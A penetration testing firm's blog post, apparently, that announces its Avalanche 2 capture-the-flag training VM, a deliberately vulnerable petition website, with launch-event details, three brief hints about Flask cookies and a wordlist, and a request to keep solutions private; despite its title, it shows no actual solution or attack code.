Avalanche 2 CTF – the solution
Many have tried, none have succeeded. So here it is, the moment you’ve all been waiting for. The solution to our Avalanche 2 CTF!
We are delighted to make Avalanche2 CTF available! It is the second appearance of the Avalanche CTF platform which is a petition/campaign website like 38 degrees or the UK.gov petitions site.
With Avalanche we are presenting a CTF challenge that has clear learning objectives for anyone trying it. To complete this you likely learn a few things along the way. It is also based on reality in two important ways:
· In a genuine application assessment, a penetration tester must find vulnerabilities within otherwise secure targets. To simulate that the site has a full range of functionality. You are encouraged to interact with the site as a legitimate user would first. This is to discover the full range of functionality before seeking to exploit anything.
· Each part of the exploit chain is something which is like vulnerabilities located and exploited by us during real-world engagements.
Some may find this trivial but there is also a fair bet that many could spend several hours or evenings.
On the road: A tale of two cities
We launched Avalanche2 with live events simultaneously at OWASP Newcastle and Glasgow Defcon (DC44141) on December 3rd:
We love taking CTFs on the road so if you enjoy this challenge then do not be shy. Contact us and we could work with you in the future (though we cannot guarantee Micky will be wearing that amazing suit every time).
Hint 1: Google “baking flask cookies”
Hint 2: Google “Flask tutorial”
Hint 3: The password is in the wordlist stored inside the web root.
- Download the CTF from here
- We have provided a PDF guide to load this VM within VMWare/VirtualBox within the zip file downloaded above.
Where is the flag?
Your challenge is to get the password for the user with administrative privileges.
If you think you have figured out the password, then well done to you! Please respect that others will still be trying so we politely request you keep the method and flag secret. We will publish an official solution by February 2020. After that you can freely discuss how you tackled it.
We appreciate you would like feedback sooner than that so follow and then ping a direct message to @PentestLtd on Twitter. We can confirm if you retrieved the correct flag and have a chat about how you did it.
Happy hunting to everyone